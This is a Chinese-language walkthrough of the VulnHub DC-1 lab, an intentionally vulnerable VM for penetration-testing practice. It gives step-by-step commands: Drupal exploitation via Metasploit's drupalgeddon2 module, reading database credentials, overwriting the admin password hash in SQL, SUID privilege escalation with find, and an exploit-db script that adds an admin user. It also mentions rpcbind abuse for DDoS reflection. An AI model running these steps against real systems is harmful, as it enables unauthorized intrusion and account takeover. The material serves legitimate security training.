DC1
下載地址:
https://download.vulnhub.com/dc/DC-1.zip
題目要求:
DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.
It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.
To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.
There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.
There are five flags in total, but the ultimate goal is to find and read the flag in root's home directory. You don't even need to be root to do this, however, you will require root privileges.
Depending on your skill level, you may be able to skip finding most of these flags and go straight for root.
Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.
資訊收集
1.1 arp-scan -l
1.2 ifconfig
1.3 nmap -p- -sV 192.168.126.130
發現rpcbind
111埠rpcbind服務 可以利用udp反射進行ddos攻擊
1.4 whatweb
滲透
2.1 發現drupal 7
2.2 進入msf
2.3 search drupal
2.3 嘗試到unix/webapp/drupal_drupalgeddon2遠端命令執行漏洞
use 1
show options
set rhost 192.168.126.130
run
getshell成功
sysinfo(help檢視可用命令)
ls
2.4 發現flag1.txt
cat flag1.txt
資料庫
3.1 提示drupal網站配置檔案有東西
3.2 發現資料庫
3.3 切換到主機的cmd中
shell
或者
shell
獲取完全互動式終端
python -c 'import pty;pty.spawn("/bin/bash")'
或
script /dev/null
3.4 mysql -udbuser -p
R0ck3t
show databases;
use drupaldb;
show tables;
select * from users;
(退出exit)
3.5 由前面檢視網站配置檔案時發現加鹽MD5
所以該hash無法爆破
另闢蹊徑
3.6 密碼重置
find / -name "password-hash.sh"
php /var/www/scripts/password-hash.sh 123
複製加salt之後的md5
$S$DRg21kugCL0AGQqr1G90hPfO.XkoCuhFqYU.HZfT8me7BiSMlYPT
再次進入mysql中
update users set pass="$S$DMHrgiAJFOw9uyksr.7CaAWWS1eMIGnGmCCjFFZrNdaDIg4dcw8B" where uid=1;
4.1 登入後臺
http://192.168.126.130
左上角的context
4.2 找到flag3
根據提示
cat /etc/passwd
cat /home/flag4.txt
4.3找到flag4
提權
5.1 根據flag4提示提權
linux提權之suid提權
5.2 查詢具有suid的命令
find / -perm -u=s -type f 2>/dev/null
find本身就有suid
5.3 find提權
find /usr/bin/find -exec "/bin/sh" \;
cd /root
cat thefinalflag.txt
5.4 找到最後一個flag
排漏
3.7 CVE-2014-3704-Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)
3.8 searchsploit Drupal
發現Drupal 7 有一個admin使用者新增漏洞
3.9 定位
locate php/webapps/34992.py
3.10 複製到桌面
cp /usr/share/exploitdb/exploits/php/webapps/34992.py ./
3.11 檢視用法
cat 34992.py
3.12 新增test/test成功
3.13 登入後臺
3.14 也是可以看到flag3
